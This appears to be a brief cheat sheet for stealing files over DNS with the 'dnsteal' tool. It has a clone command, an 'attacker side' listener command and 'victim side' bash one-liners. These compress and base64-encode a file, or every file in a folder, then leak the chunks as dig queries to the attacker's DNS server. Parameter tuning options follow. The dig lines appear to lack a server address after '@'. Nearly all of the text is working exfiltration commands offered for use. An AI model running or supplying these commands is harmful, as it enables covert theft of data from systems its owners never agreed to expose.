
git clone https://github.com/m57/dnsteal.git

attacker side:

python dnsteal.py -z -v 

victim side

for one file transfer:

f=file.txt; s=4;b=57;c=0; for r in $(for i in $(gzip -c $f| base64 -w0 | sed "s/.\{$b\}/&\n/g");do if [[ "$c" -lt "$s"  ]]; then echo -ne "$i-."; c=$(($c+1)); else echo -ne "\n$i-."; c=1; fi; done ); do dig @ `echo -ne $r$f|tr "+" "*"` +short; done

for a folder ( have to be in the folder you want to download and there should be no sub folders in it just files):

for f in $(ls .); do s=4;b=57;c=0; for r in $(for i in $(gzip -c $f| base64 -w0 | sed "s/.\{$b\}/&\n/g");do if [[ "$c" -lt "$s"  ]]; then echo -ne "$i-."; c=$(($c+1)); else echo -ne "\n$i-."; c=1; fi; done ); do dig @ `echo -ne $r$f|tr "+" "*"` +short; done ; done

This one would send 45 bytes per subdomain, of which there are 4 in the query. 15 bytes reserved for filename at the end.

python dnsteal.py -z -v -b 45 -s 4 -f 15

This one would leave no space for filename.

python dnsteal.py -z -v -b 63 -s 4 -f 0

Last updated